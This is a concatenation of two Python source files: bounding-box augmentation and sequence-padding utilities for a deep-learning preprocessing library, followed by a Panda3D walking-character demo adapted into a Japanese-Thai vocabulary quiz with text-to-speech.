# im = np.zeros([80, 100, 3]) # as an image with shape width=100, height=80
# _, coords = obj_box_imresize(im, coords=[[20, 40, 30, 30], [10, 20, 20, 20]], size=[160, 200], is_rescale=False)
# tl.logging.info(coords)
# # [[40, 80, 60, 60], [20, 40, 40, 40]]
# _, coords = obj_box_imresize(im, coords=[[20, 40, 30, 30]], size=[40, 100], is_rescale=False)
# tl.logging.info(coords)
# # [20, 20, 30, 15]
# _, coords = obj_box_imresize(im, coords=[[20, 40, 30, 30]], size=[60, 150], is_rescale=False)
# tl.logging.info(coords)
# # [30, 30, 45, 22]
# im2, coords = obj_box_imresize(im, coords=[[0.2, 0.4, 0.3, 0.3]], size=[160, 200], is_rescale=True)
# tl.logging.info(coords, im2.shape)
# # [0.2, 0.4, 0.3, 0.3] (160, 200, 3)
# exit()
def obj_box_crop(
im, classes=None, coords=None, wrg=100, hrg=100, is_rescale=False, is_center=False, is_random=False,
thresh_wh=0.02, thresh_wh2=12.
):
"""Randomly or centrally crop an image, and compute the new bounding box coordinates.
Objects outside the cropped image will be removed.
Parameters
-----------
im : numpy.array
An image with dimension of [row, col, channel] (default).
classes : list of int or None
Class IDs.
coords : list of list of 4 int/float or None
Coordinates [[x, y, w, h], [x, y, w, h], ...]
wrg hrg and is_random : args
See ``tl.prepro.crop``.
is_rescale : boolean
Set to True, if the input coordinates are rescaled to [0, 1]. Default is False.
is_center : boolean, default False
Set to True, if the x and y of coordinates are the centroid (i.e. darknet format). Default is False.
thresh_wh : float
Threshold, remove the box if its ratio of width(height) to image size less than the threshold.
thresh_wh2 : float
Threshold, remove the box if its ratio of width to height or vice verse higher than the threshold.
Returns
-------
numpy.array
A processed image
list of int
A list of classes
list of list of 4 numbers
A list of new bounding boxes.
"""
if classes is None:
classes = []
if coords is None:
coords = []
h, w = im.shape[0], im.shape[1]
if (h <= hrg) or (w <= wrg):
raise AssertionError("The size of cropping should smaller than the original image")
if is_random:
h_offset = int(np.random.uniform(0, h - hrg) - 1)
w_offset = int(np.random.uniform(0, w - wrg) - 1)
h_end = hrg + h_offset
w_end = wrg + w_offset
im_new = im[h_offset:h_end, w_offset:w_end]
else: # central crop
h_offset = int(np.floor((h - hrg) / 2.))
w_offset = int(np.floor((w - wrg) / 2.))
h_end = h_offset + hrg
w_end = w_offset + wrg
im_new = im[h_offset:h_end, w_offset:w_end]
# w
# _____________________________
# | h/w offset |
# | ------- |
# h | | | |
# | | | |
# | ------- |
# | h/w end |
# |___________________________|
def _get_coord(coord):
"""Input pixel-unit [x, y, w, h] format, then make sure [x, y] it is the up-left coordinates,
before getting the new coordinates.
Boxes outsides the cropped image will be removed.
"""
if is_center:
coord = obj_box_coord_centroid_to_upleft(coord)
##======= pixel unit format and upleft, w, h ==========##
# x = np.clip( coord[0] - w_offset, 0, w_end - w_offset)
# y = np.clip( coord[1] - h_offset, 0, h_end - h_offset)
# w = np.clip( coord[2] , 0, w_end - w_offset)
# h = np.clip( coord[3] , 0, h_end - h_offset)
x = coord[0] - w_offset
y = coord[1] - h_offset
w = coord[2]
h = coord[3]
if x < 0:
if x + w <= 0:
return None
w = w + x
x = 0
elif x > im_new.shape[1]: # object outside the cropped image
return None
if y < 0:
if y + h <= 0:
return None
h = h + y
y = 0
elif y > im_new.shape[0]: # object outside the cropped image
return None
if (x is not None) and (x + w > im_new.shape[1]): # box outside the cropped image
w = im_new.shape[1] - x
if (y is not None) and (y + h > im_new.shape[0]): # box outside the cropped image
h = im_new.shape[0] - y
if (w / (h + 1.) > thresh_wh2) or (h / (w + 1.) > thresh_wh2): # object shape strange: too narrow
# tl.logging.info('xx', w, h)
return None
if (w / (im_new.shape[1] * 1.) < thresh_wh) or (h / (im_new.shape[0] * 1.) <
thresh_wh): # object shape strange: too narrow
# tl.logging.info('yy', w, im_new.shape[1], h, im_new.shape[0])
return None
coord = [x, y, w, h]
## convert back if input format is center.
if is_center:
coord = obj_box_coord_upleft_to_centroid(coord)
return coord
coords_new = list()
classes_new = list()
for i, _ in enumerate(coords):
coord = coords[i]
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
if is_rescale:
# for scaled coord, upscaled before process and scale back in the end.
coord = obj_box_coord_scale_to_pixelunit(coord, im.shape)
coord = _get_coord(coord)
if coord is not None:
coord = obj_box_coord_rescale(coord, im_new.shape)
coords_new.append(coord)
classes_new.append(classes[i])
else:
coord = _get_coord(coord)
if coord is not None:
coords_new.append(coord)
classes_new.append(classes[i])
return im_new, classes_new, coords_new
def obj_box_shift(
im, classes=None, coords=None, wrg=0.1, hrg=0.1, row_index=0, col_index=1, channel_index=2, fill_mode='nearest',
cval=0., order=1, is_rescale=False, is_center=False, is_random=False, thresh_wh=0.02, thresh_wh2=12.
):
"""Shift an image randomly or non-randomly, and compute the new bounding box coordinates.
Objects outside the cropped image will be removed.
Parameters
-----------
im : numpy.array
An image with dimension of [row, col, channel] (default).
classes : list of int or None
Class IDs.
coords : list of list of 4 int/float or None
Coordinates [[x, y, w, h], [x, y, w, h], ...]
wrg, hrg row_index col_index channel_index is_random fill_mode cval and order : see ``tl.prepro.shift``.
is_rescale : boolean
Set to True, if the input coordinates are rescaled to [0, 1]. Default is False.
is_center : boolean
Set to True, if the x and y of coordinates are the centroid (i.e. darknet format). Default is False.
thresh_wh : float
Threshold, remove the box if its ratio of width(height) to image size less than the threshold.
thresh_wh2 : float
Threshold, remove the box if its ratio of width to height or vice verse higher than the threshold.
Returns
-------
numpy.array
A processed image
list of int
A list of classes
list of list of 4 numbers
A list of new bounding boxes.
"""
if classes is None:
classes = []
if coords is None:
coords = []
imh, imw = im.shape[row_index], im.shape[col_index]
if (hrg >= 1.0) and (hrg <= 0.) and (wrg >= 1.0) and (wrg <= 0.):
raise AssertionError("shift range should be (0, 1)")
if is_random:
tx = np.random.uniform(-hrg, hrg) * imh
ty = np.random.uniform(-wrg, wrg) * imw
else:
tx, ty = hrg * imh, wrg * imw
translation_matrix = np.array([[1, 0, tx], [0, 1, ty], [0, 0, 1]])
transform_matrix = translation_matrix # no need to do offset
im_new = apply_transform(im, transform_matrix, channel_index, fill_mode, cval, order)
# modified from obj_box_crop
def _get_coord(coord):
"""Input pixel-unit [x, y, w, h] format, then make sure [x, y] it is the up-left coordinates,
before getting the new coordinates.
Boxes outsides the cropped image will be removed.
"""
if is_center:
coord = obj_box_coord_centroid_to_upleft(coord)
##======= pixel unit format and upleft, w, h ==========##
x = coord[0] - ty # only change this
y = coord[1] - tx # only change this
w = coord[2]
h = coord[3]
if x < 0:
if x + w <= 0:
return None
w = w + x
x = 0
elif x > im_new.shape[1]: # object outside the cropped image
return None
if y < 0:
if y + h <= 0:
return None
h = h + y
y = 0
elif y > im_new.shape[0]: # object outside the cropped image
return None
if (x is not None) and (x + w > im_new.shape[1]): # box outside the cropped image
w = im_new.shape[1] - x
if (y is not None) and (y + h > im_new.shape[0]): # box outside the cropped image
h = im_new.shape[0] - y
if (w / (h + 1.) > thresh_wh2) or (h / (w + 1.) > thresh_wh2): # object shape strange: too narrow
# tl.logging.info('xx', w, h)
return None
if (w / (im_new.shape[1] * 1.) < thresh_wh) or (h / (im_new.shape[0] * 1.) <
thresh_wh): # object shape strange: too narrow
# tl.logging.info('yy', w, im_new.shape[1], h, im_new.shape[0])
return None
coord = [x, y, w, h]
## convert back if input format is center.
if is_center:
coord = obj_box_coord_upleft_to_centroid(coord)
return coord
coords_new = list()
classes_new = list()
for i, _ in enumerate(coords):
coord = coords[i]
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
if is_rescale:
# for scaled coord, upscaled before process and scale back in the end.
coord = obj_box_coord_scale_to_pixelunit(coord, im.shape)
coord = _get_coord(coord)
if coord is not None:
coord = obj_box_coord_rescale(coord, im_new.shape)
coords_new.append(coord)
classes_new.append(classes[i])
else:
coord = _get_coord(coord)
if coord is not None:
coords_new.append(coord)
classes_new.append(classes[i])
return im_new, classes_new, coords_new
def obj_box_zoom(
im, classes=None, coords=None, zoom_range=(0.9,
1.1), row_index=0, col_index=1, channel_index=2, fill_mode='nearest',
cval=0., order=1, is_rescale=False, is_center=False, is_random=False, thresh_wh=0.02, thresh_wh2=12.
):
"""Zoom in and out of a single image, randomly or non-randomly, and compute the new bounding box coordinates.
Objects outside the cropped image will be removed.
Parameters
-----------
im : numpy.array
An image with dimension of [row, col, channel] (default).
classes : list of int or None
Class IDs.
coords : list of list of 4 int/float or None
Coordinates [[x, y, w, h], [x, y, w, h], ...].
zoom_range row_index col_index channel_index is_random fill_mode cval and order : see ``tl.prepro.zoom``.
is_rescale : boolean
Set to True, if the input coordinates are rescaled to [0, 1]. Default is False.
is_center : boolean
Set to True, if the x and y of coordinates are the centroid. (i.e. darknet format). Default is False.
thresh_wh : float
Threshold, remove the box if its ratio of width(height) to image size less than the threshold.
thresh_wh2 : float
Threshold, remove the box if its ratio of width to height or vice verse higher than the threshold.
Returns
-------
numpy.array
A processed image
list of int
A list of classes
list of list of 4 numbers
A list of new bounding boxes.
"""
if classes is None:
classes = []
if coords is None:
coords = []
if len(zoom_range) != 2:
raise Exception('zoom_range should be a tuple or list of two floats. ' 'Received arg: ', zoom_range)
if is_random:
if zoom_range[0] == 1 and zoom_range[1] == 1:
zx, zy = 1, 1
tl.logging.info(" random_zoom : not zoom in/out")
else:
zx, zy = np.random.uniform(zoom_range[0], zoom_range[1], 2)
else:
zx, zy = zoom_range
# tl.logging.info(zx, zy)
zoom_matrix = np.array([[zx, 0, 0], [0, zy, 0], [0, 0, 1]])
h, w = im.shape[row_index], im.shape[col_index]
transform_matrix = transform_matrix_offset_center(zoom_matrix, h, w)
im_new = apply_transform(im, transform_matrix, channel_index, fill_mode, cval, order)
# modified from obj_box_crop
def _get_coord(coord):
"""Input pixel-unit [x, y, w, h] format, then make sure [x, y] it is the up-left coordinates,
before getting the new coordinates.
Boxes outsides the cropped image will be removed.
"""
if is_center:
coord = obj_box_coord_centroid_to_upleft(coord)
# ======= pixel unit format and upleft, w, h ==========
x = (coord[0] - im.shape[1] / 2) / zy + im.shape[1] / 2 # only change this
y = (coord[1] - im.shape[0] / 2) / zx + im.shape[0] / 2 # only change this
w = coord[2] / zy # only change this
h = coord[3] / zx # only change thisS
if x < 0:
if x + w <= 0:
return None
w = w + x
x = 0
elif x > im_new.shape[1]: # object outside the cropped image
return None
if y < 0:
if y + h <= 0:
return None
h = h + y
y = 0
elif y > im_new.shape[0]: # object outside the cropped image
return None
if (x is not None) and (x + w > im_new.shape[1]): # box outside the cropped image
w = im_new.shape[1] - x
if (y is not None) and (y + h > im_new.shape[0]): # box outside the cropped image
h = im_new.shape[0] - y
if (w / (h + 1.) > thresh_wh2) or (h / (w + 1.) > thresh_wh2): # object shape strange: too narrow
# tl.logging.info('xx', w, h)
return None
if (w / (im_new.shape[1] * 1.) < thresh_wh) or (h / (im_new.shape[0] * 1.) <
thresh_wh): # object shape strange: too narrow
# tl.logging.info('yy', w, im_new.shape[1], h, im_new.shape[0])
return None
coord = [x, y, w, h]
# convert back if input format is center.
if is_center:
coord = obj_box_coord_upleft_to_centroid(coord)
return coord
coords_new = list()
classes_new = list()
for i, _ in enumerate(coords):
coord = coords[i]
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
if is_rescale:
# for scaled coord, upscaled before process and scale back in the end.
coord = obj_box_coord_scale_to_pixelunit(coord, im.shape)
coord = _get_coord(coord)
if coord is not None:
coord = obj_box_coord_rescale(coord, im_new.shape)
coords_new.append(coord)
classes_new.append(classes[i])
else:
coord = _get_coord(coord)
if coord is not None:
coords_new.append(coord)
classes_new.append(classes[i])
return im_new, classes_new, coords_new
def pad_sequences(sequences, maxlen=None, dtype='int32', padding='post', truncating='pre', value=0.):
"""Pads each sequence to the same length:
the length of the longest sequence.
If maxlen is provided, any sequence longer
than maxlen is truncated to maxlen.
Truncation happens off either the beginning (default) or
the end of the sequence.
Supports post-padding and pre-padding (default).
Parameters
----------
sequences : list of list of int
All sequences where each row is a sequence.
maxlen : int
Maximum length.
dtype : numpy.dtype or str
Data type to cast the resulting sequence.
padding : str
Either 'pre' or 'post', pad either before or after each sequence.
truncating : str
Either 'pre' or 'post', remove values from sequences larger than maxlen either in the beginning or in the end of the sequence
value : float
Value to pad the sequences to the desired value.
Returns
----------
x : numpy.array
With dimensions (number_of_sequences, maxlen)
Examples
----------
>>> sequences = [[1,1,1,1,1],[2,2,2],[3,3]]
>>> sequences = pad_sequences(sequences, maxlen=None, dtype='int32',
... padding='post', truncating='pre', value=0.)
[[1 1 1 1 1]
[2 2 2 0 0]
[3 3 0 0 0]]
"""
lengths = [len(s) for s in sequences]
nb_samples = len(sequences)
if maxlen is None:
maxlen = np.max(lengths)
# take the sample shape from the first non empty sequence
# checking for consistency in the main loop below.
sample_shape = tuple()
for s in sequences:
if len(s) > 0:
sample_shape = np.asarray(s).shape[1:]
break
x = (np.ones((nb_samples, maxlen) + sample_shape) * value).astype(dtype)
for idx, s in enumerate(sequences):
if len(s) == 0:
continue # empty list was found
if truncating == 'pre':
trunc = s[-maxlen:]
elif truncating == 'post':
trunc = s[:maxlen]
else:
raise ValueError('Truncating type "%s" not understood' % truncating)
# check `trunc` has expected shape
trunc = np.asarray(trunc, dtype=dtype)
if trunc.shape[1:] != sample_shape:
raise ValueError(
'Shape of sample %s of sequence at position %s is different from expected shape %s' %
(trunc.shape[1:], idx, sample_shape)
)
if padding == 'post':
x[idx, :len(trunc)] = trunc
elif padding == 'pre':
x[idx, -len(trunc):] = trunc
else:
raise ValueError('Padding type "%s" not understood' % padding)
return x.tolist()
def remove_pad_sequences(sequences, pad_id=0):
"""Remove padding.
Parameters
-----------
sequences : list of list of int
All sequences where each row is a sequence.
pad_id : int
The pad ID.
Returns
----------
list of list of int
The processed sequences.
Examples
----------
>>> sequences = [[2,3,4,0,0], [5,1,2,3,4,0,0,0], [4,5,0,2,4,0,0,0]]
>>> print(remove_pad_sequences(sequences, pad_id=0))
[[2, 3, 4], [5, 1, 2, 3, 4], [4, 5, 0, 2, 4]]
"""
sequences_out = copy.deepcopy(sequences)
for i, _ in enumerate(sequences):
# for j in range(len(sequences[i])):
# if sequences[i][j] == pad_id:
# sequences_out[i] = sequences_out[i][:j]
# break
for j in range(1, len(sequences[i])):
if sequences[i][-j] != pad_id:
sequences_out[i] = sequences_out[i][0:-j + 1]
break
return sequences_out
def process_sequences(sequences, end_id=0, pad_val=0, is_shorten=True, remain_end_id=False):
"""Set all tokens(ids) after END token to the padding value, and then shorten (option) it to the maximum sequence length in this batch.
Parameters
-----------
sequences : list of list of int
All sequences where each row is a sequence.
end_id : int
The special token for END.
pad_val : int
Replace the `end_id` and the IDs after `end_id` to this value.
is_shorten : boolean
Shorten the sequences. Default is True.
remain_end_id : boolean
Keep an `end_id` in the end. Default is False.
Returns
----------
list of list of int
The processed sequences.
Examples
---------
>>> sentences_ids = [[4, 3, 5, 3, 2, 2, 2, 2], <-- end_id is 2
... [5, 3, 9, 4, 9, 2, 2, 3]] <-- end_id is 2
>>> sentences_ids = precess_sequences(sentences_ids, end_id=vocab.end_id, pad_val=0, is_shorten=True)
[[4, 3, 5, 3, 0], [5, 3, 9, 4, 9]]
"""
max_length = 0
for _, seq in enumerate(sequences):
is_end = False
for i_w, n in enumerate(seq):
if n == end_id and is_end == False: # 1st time to see end_id
is_end = True
if max_length < i_w:
max_length = i_w
if remain_end_id is False:
seq[i_w] = pad_val # set end_id to pad_val
elif is_end ==True:
seq[i_w] = pad_val
if remain_end_id is True:
max_length += 1
if is_shorten:
for i, seq in enumerate(sequences):
sequences[i] = seq[:max_length]
return sequences
def sequences_add_start_id(sequences, start_id=0, remove_last=False):
"""Add special start token(id) in the beginning of each sequence.
Parameters
------------
sequences : list of list of int
All sequences where each row is a sequence.
start_id : int
The start ID.
remove_last : boolean
Remove the last value of each sequences. Usually be used for removing the end ID.
Returns
----------
list of list of int
The processed sequences.
Examples
---------
>>> sentences_ids = [[4,3,5,3,2,2,2,2], [5,3,9,4,9,2,2,3]]
>>> sentences_ids = sequences_add_start_id(sentences_ids, start_id=2)
[[2, 4, 3, 5, 3, 2, 2, 2, 2], [2, 5, 3, 9, 4, 9, 2, 2, 3]]
>>> sentences_ids = sequences_add_start_id(sentences_ids, start_id=2, remove_last=True)
[[2, 4, 3, 5, 3, 2, 2, 2], [2, 5, 3, 9, 4, 9, 2, 2]]
For Seq2seq
>>> input = [a, b, c]
>>> target = [x, y, z]
>>> decode_seq = [start_id, a, b] <-- sequences_add_start_id(input, start_id, True)
"""
sequences_out = [[] for _ in range(len(sequences))] #[[]] * len(sequences)
for i, _ in enumerate(sequences):
if remove_last:
sequences_out[i] = [start_id] + sequences[i][:-1]
else:
sequences_out[i] = [start_id] + sequences[i]
return sequences_out
def sequences_add_end_id(sequences, end_id=888):
"""Add special end token(id) in the end of each sequence.
Parameters
-----------
sequences : list of list of int
All sequences where each row is a sequence.
end_id : int
The end ID.
Returns
----------
list of list of int
The processed sequences.
Examples
---------
>>> sequences = [[1,2,3],[4,5,6,7]]
>>> print(sequences_add_end_id(sequences, end_id=999))
[[1, 2, 3, 999], [4, 5, 6, 999]]
"""
sequences_out = [[] for _ in range(len(sequences))] #[[]] * len(sequences)
for i, _ in enumerate(sequences):
sequences_out[i] = sequences[i] + [end_id]
return sequences_out
def sequences_add_end_id_after_pad(sequences, end_id=888, pad_id=0):
"""Add special end token(id) in the end of each sequence.
Parameters
-----------
sequences : list of list of int
All sequences where each row is a sequence.
end_id : int
The end ID.
pad_id : int
The pad ID.
Returns
----------
list of list of int
The processed sequences.
Examples
---------
>>> sequences = [[1,2,0,0], [1,2,3,0], [1,2,3,4]]
>>> print(sequences_add_end_id_after_pad(sequences, end_id=99, pad_id=0))
[[1, 2, 99, 0], [1, 2, 3, 99], [1, 2, 3, 4]]
"""
# sequences_out = [[] for _ in range(len(sequences))]#[[]] * len(sequences)
sequences_out = copy.deepcopy(sequences)
# # add a pad to all
# for i in range(len(sequences)):
# for j in range(len(sequences[i])):
# sequences_out[i].append(pad_id)
# # pad -- > end
# max_len = 0
for i, v in enumerate(sequences):
for j, _v2 in enumerate(v):
if sequences[i][j] == pad_id:
sequences_out[i][j] = end_id
# if j > max_len:
# max_len = j
break
# # remove pad if too long
# for i in range(len(sequences)):
# for j in range(len(sequences[i])):
# sequences_out[i] = sequences_out[i][:max_len+1]
return sequences_out
def sequences_get_mask(sequences, pad_val=0):
"""Return mask for sequences.
Parameters
-----------
sequences : list of list of int
All sequences where each row is a sequence.
pad_val : int
The pad value.
Returns
----------
list of list of int
The mask.
Examples
---------
>>> sentences_ids = [[4, 0, 5, 3, 0, 0],
... [5, 3, 9, 4, 9, 0]]
>>> mask = sequences_get_mask(sentences_ids, pad_val=0)
[[1 1 1 1 0 0]
[1 1 1 1 1 0]]
"""
mask = np.ones_like(sequences)
for i, seq in enumerate(sequences):
for i_w in reversed(range(len(seq))):
if seq[i_w] == pad_val:
mask[i, i_w] = 0
else:
break # <-- exit the for loop, prepcess next sequence
return mask
|
main.py
|
#!/usr/bin/env python
# Author: Ryan Myers
# Models: Jeff Styers, Reagan Heller
#
# Last Updated: 2015-03-13
#
# This tutorial provides an example of creating a character
# and having it walk around on uneven terrain, as well
# as implementing a fully rotatable camera.
from gtts import gTTS
from playsound import playsound
import os
global playagain
playagain = True
import random
randomnum = list(range(65,90))
deletemp3 = True
allfolder = os.listdir()
if deletemp3:
for f in allfolder:
if f[-3:] == 'mp3':
os.remove(f)
def generatename():
nm = ''
for i in range(15):
rd = chr(random.choice(randomnum))
nm += rd
nm += '.mp3'
return nm
#allfilename = []
#-------------------------
import threading
from direct.showbase.ShowBase import ShowBase
from panda3d.core import CollisionTraverser, CollisionNode
from panda3d.core import CollisionHandlerQueue, CollisionRay
from panda3d.core import Filename, AmbientLight, DirectionalLight
from panda3d.core import PandaNode, NodePath, Camera, TextNode
from panda3d.core import CollideMask
from direct.gui.OnscreenText import OnscreenText
from direct.actor.Actor import Actor
import random
import sys
import os
import math
import time
# Function to put instructions on the screen.
def addInstructions(pos, msg):
return OnscreenText(text=msg, style=1, fg=(1, 1, 1, 1), scale=.10,
shadow=(0, 0, 0, 1), parent=base.a2dTopLeft,
pos=(0.08, -pos - 0.04), align=TextNode.ALeft,font = loader.loadFont("japanese.ttf"))
def addInstructions2(pos, msg):
return OnscreenText(text=msg, style=1, fg=(1, 1, 1, 1), scale=.10,
shadow=(0, 0, 0, 1), parent=base.a2dTopLeft,
pos=(0.08, -pos - 0.04), align=TextNode.ALeft,font = loader.loadFont("THSarabunNew.ttf"))
def addInstructions3(pos, msg):
return OnscreenText(text=msg, style=1, fg=(1, 1, 1, 1), scale=.10,
shadow=(0, 0, 0, 1), parent=base.a2dBottomRight,
pos=(-0.1, 1.8), align=TextNode.ARight,font = loader.loadFont("THSarabunNew.ttf"))
# Function to put title on the screen.
def addTitle(text):
return OnscreenText(text=text, style=1, fg=(1, 1, 1, 1), scale=.10,
parent=base.a2dBottomRight, align=TextNode.ARight,
pos=(-0.1, 0.09), shadow=(0, 0, 0, 1),font = loader.loadFont("THSarabunNew.ttf"),)
class Allbox:
def __init__(self):
self.box = Actor("models/Box")
self.box.reparentTo(render)
self.box.setScale(.2)
self.box.setPos(-102,0.3,-0.5)
class RoamingRalphDemo(ShowBase):
def __init__(self):
# Set up the window, camera, etc.
ShowBase.__init__(self)
self.question = {1:{'qa':'猫はタイ語で何ですか?',
'ans':3,
'a1':'ไก่',
'a2':'หนู',
'a3':'แมว',
'a4':'ช้าง'},
2:{'qa':'あかはタイ語で何ですか?',
'ans':1,
'a1':'สีแดง',
'a2':'สีเหลือง',
'a3':'สีส้ม',
'a4':'สีดำ'}}
self.currentqa = 1
self.allfilename = []
# Set the background color to black
self.win.setClearColor((0, 0, 0, 1))
# This is used to store which keys are currently pressed.
self.keyMap = {
"left": 0, "right": 0, "forward": 0, "cam-left": 0, "cam-right": 0}
# Post the instructions
#self.font = loader.loadFont("tahoma.ttf")
self.title = addTitle("เกมฝึกภาษาญี่ปุ่น โดย ลุงวิศวกรจร้าา")
self.qa = addInstructions(0.10, " ")
self.a1 = addInstructions2(0.20, " ")
self.a2 = addInstructions2(0.30, " ")
self.a3 = addInstructions2(0.40, " ")
self.a4 = addInstructions2(0.50, " ")
# Set up the environment
#
# This environment model contains collision meshes. If you look
# in the egg file, you will see the following:
#
# <Collide> { Polyset keep descend }
#
# This tag causes the following mesh to be converted to a collision
# mesh -- a mesh which is optimized for collision, not rendering.
# It also keeps the original mesh, so there are now two copies ---
# one optimized for rendering, one for collisions.
self.environ = loader.loadModel("models/world")
self.environ.reparentTo(render)
# Create the main character, Ralph
ralphStartPos = self.environ.find("**/start_point").getPos()
self.ralph = Actor("models/ralph",
{"run": "models/ralph-run",
"walk": "models/ralph-walk"})
self.ralph.reparentTo(render)
self.ralph.setScale(.2)
self.ralph.setPos(ralphStartPos + (0, 0, 0.5))
#for i in range(5):
'''
self.box = Actor("models/Box")
self.box.reparentTo(render)
self.box.setScale(.2)
self.box.setPos(-102,0.3,-0.5)
'''
model = Allbox()
self.box = model.box
# Create a floater object, which floats 2 units above ralph. We
# use this as a target for the camera to look at.
self.floater = NodePath(PandaNode("floater"))
self.floater.reparentTo(self.ralph)
self.floater.setZ(1.0)
# Accept the control keys for movement and rotation
self.accept("escape", sys.exit)
self.accept("a", self.setKey, ["left", True])
self.accept("d", self.setKey, ["right", True])
self.accept("w", self.setKey, ["forward", True])
#self.accept("a", self.setKey, ["cam-left", True])
#self.accept("s", self.setKey, ["cam-right", True])
self.accept("a-up", self.setKey, ["left", False])
self.accept("d-up", self.setKey, ["right", False])
self.accept("w-up", self.setKey, ["forward", False])
#self.accept("a-up", self.setKey, ["cam-left", False])
#self.accept("s-up", self.setKey, ["cam-right", False])
self.accept('z', self.openBox)
self.ans = 1
self.accept('1', self.CheckResult,[1])
self.accept('2', self.CheckResult,[2])
self.accept('3', self.CheckResult,[3])
self.accept('4', self.CheckResult,[4])
taskMgr.add(self.move, "moveTask")
# Game state variables
self.isMoving = False
# Set up the camera
self.disableMouse()
self.camera.setPos(self.ralph.getX(), self.ralph.getY() + 10, 2)
# We will detect the height of the terrain by creating a collision
# ray and casting it downward toward the terrain. One ray will
# start above ralph's head, and the other will start above the camera.
# A ray may hit the terrain, or it may hit a rock or a tree. If it
# hits the terrain, we can detect the height. If it hits anything
# else, we rule that the move is illegal.
self.cTrav = CollisionTraverser()
self.ralphGroundRay = CollisionRay()
self.ralphGroundRay.setOrigin(0, 0, 9)
self.ralphGroundRay.setDirection(0, 0, -1)
self.ralphGroundCol = CollisionNode('ralphRay')
self.ralphGroundCol.addSolid(self.ralphGroundRay)
self.ralphGroundCol.setFromCollideMask(CollideMask.bit(0))
self.ralphGroundCol.setIntoCollideMask(CollideMask.allOff())
self.ralphGroundColNp = self.ralph.attachNewNode(self.ralphGroundCol)
self.ralphGroundHandler = CollisionHandlerQueue()
self.cTrav.addCollider(self.ralphGroundColNp, self.ralphGroundHandler)
self.camGroundRay = CollisionRay()
self.camGroundRay.setOrigin(0, 0, 9)
self.camGroundRay.setDirection(0, 0, -1)
self.camGroundCol = CollisionNode('camRay')
self.camGroundCol.addSolid(self.camGroundRay)
self.camGroundCol.setFromCollideMask(CollideMask.bit(0))
self.camGroundCol.setIntoCollideMask(CollideMask.allOff())
self.camGroundColNp = self.camera.attachNewNode(self.camGroundCol)
self.camGroundHandler = CollisionHandlerQueue()
self.cTrav.addCollider(self.camGroundColNp, self.camGroundHandler)
# Uncomment this line to see the collision rays
#self.ralphGroundColNp.show()
#self.camGroundColNp.show()
# Uncomment this line to show a visual representation of the
# collisions occuring
#self.cTrav.showCollisions(render)
# Create some lighting
ambientLight = AmbientLight("ambientLight")
ambientLight.setColor((.3, .3, .3, 1))
directionalLight = DirectionalLight("directionalLight")
directionalLight.setDirection((-5, -5, -5))
directionalLight.setColor((1, 1, 1, 1))
directionalLight.setSpecularColor((1, 1, 1, 1))
render.setLight(render.attachNewNode(ambientLight))
render.setLight(render.attachNewNode(directionalLight))
#Add Sound
self.box_sound = loader.loadSfx("box.ogg")
# Score
self.score = 0
self.a5 = addInstructions3(0.3, "Score: {}".format(self.score))
self.playagain = True
def speak(self,word):
tts = gTTS(text= word, lang='ja')
name = generatename()
tts.save(name + '.mp3')
playsound(name + '.mp3')
# Records the state of the arrow keys
def CheckResult(self,number):
self.playsound = True
current = self.question[self.currentqa]
if number == self.question[self.currentqa]['ans']:
self.score += 1
self.a5.setText("Score: {}".format(self.score))
selectqa = self.question[self.currentqa]
if number == 1:
self.a1.setText('[1] '+ selectqa['a1'] + ' O')
self.a2.setText('[2] '+ selectqa['a2'])
self.a3.setText('[3] '+ selectqa['a3'])
self.a4.setText('[4] '+ selectqa['a4'])
elif number == 2:
self.a2.setText('[2] '+ selectqa['a2'] + ' O')
self.a1.setText('[1] '+ selectqa['a1'])
self.a3.setText('[3] '+ selectqa['a3'])
self.a4.setText('[4] '+ selectqa['a4'])
elif number == 3:
self.a3.setText('[3] '+ selectqa['a3'] + ' O')
self.a1.setText('[1] '+ selectqa['a1'])
self.a2.setText('[2] '+ selectqa['a2'])
self.a4.setText('[4] '+ selectqa['a4'])
elif number == 4:
self.a4.setText('[4] '+ selectqa['a4'] + ' O')
self.a3.setText('[3] '+ selectqa['a3'])
self.a2.setText('[2] '+ selectqa['a2'])
self.a1.setText('[1] '+ selectqa['a1'])
else:
pass
task1 = threading.Thread(target=self.speak,args=('はい、そうです。',))
task1.start()
self.closeBox()
#self.speak('はい、そうです。')
else:
selectqa = self.question[self.currentqa]
if number == 1:
self.a1.setText('[1] '+ selectqa['a1'] + ' x')
self.a2.setText('[2] '+ selectqa['a2'])
self.a3.setText('[3] '+ selectqa['a3'])
self.a4.setText('[4] '+ selectqa['a4'])
elif number == 2:
self.a2.setText('[2] '+ selectqa['a2'] + ' x')
self.a1.setText('[1] '+ selectqa['a1'])
self.a3.setText('[3] '+ selectqa['a3'])
self.a4.setText('[4] '+ selectqa['a4'])
elif number == 3:
self.a3.setText('[3] '+ selectqa['a3'] + ' x')
self.a1.setText('[1] '+ selectqa['a1'])
self.a2.setText('[2] '+ selectqa['a2'])
self.a4.setText('[4] '+ selectqa['a4'])
elif number == 4:
self.a4.setText('[4] '+ selectqa['a4'] + ' x')
self.a3.setText('[3] '+ selectqa['a3'])
self.a2.setText('[2] '+ selectqa['a2'])
self.a1.setText('[1] '+ selectqa['a1'])
else:
pass
task1 = threading.Thread(target=self.speak,args=('じゃないです。',))
task1.start()
self.closeBox()
def setKey(self, key, value):
self.keyMap[key] = value
def openBox(self):
print('CURRENT: ',self.allfilename)
pry = self.ralph.getY()
pby = self.box.getY()
prx = self.ralph.getX()
pbx = self.box.getX()
check1 = prx < pbx + 1.5 and prx > pbx -1.5
check2 = pry < pby + 1.5 and pry > pby -1.5
print(prx-pbx,':',pry-pby)
print(check1, check2)
startpos = self.ralph.getPos()
print(startpos,'BY', self.box.getY(),'BX', self.box.getX())
def Play():
tts = gTTS(text= selectqa['qa'], lang='ja')
name = generatename()
tts.save(name + '.mp3')
playsound(name + '.mp3')
if check1 and check2:
rdnum = list(range(1,3))
number = random.choice(rdnum)
selectqa = self.question[number]
self.currentqa = number
self.qa.setText('Question: '+ selectqa['qa'])
self.a1.setText('[1] '+ selectqa['a1'])
self.a2.setText('[2] '+ selectqa['a2'])
self.a3.setText('[3] '+ selectqa['a3'])
self.a4.setText('[4] '+ selectqa['a4'])
self.box.play('openBox')
self.box_sound.play()
task1 = threading.Thread(target=Play)
task1.start()
# if self.playagain == True:
# name = generatename()
# self.allfilename.append(name)
# tts.save(name)
# self.playagain = False
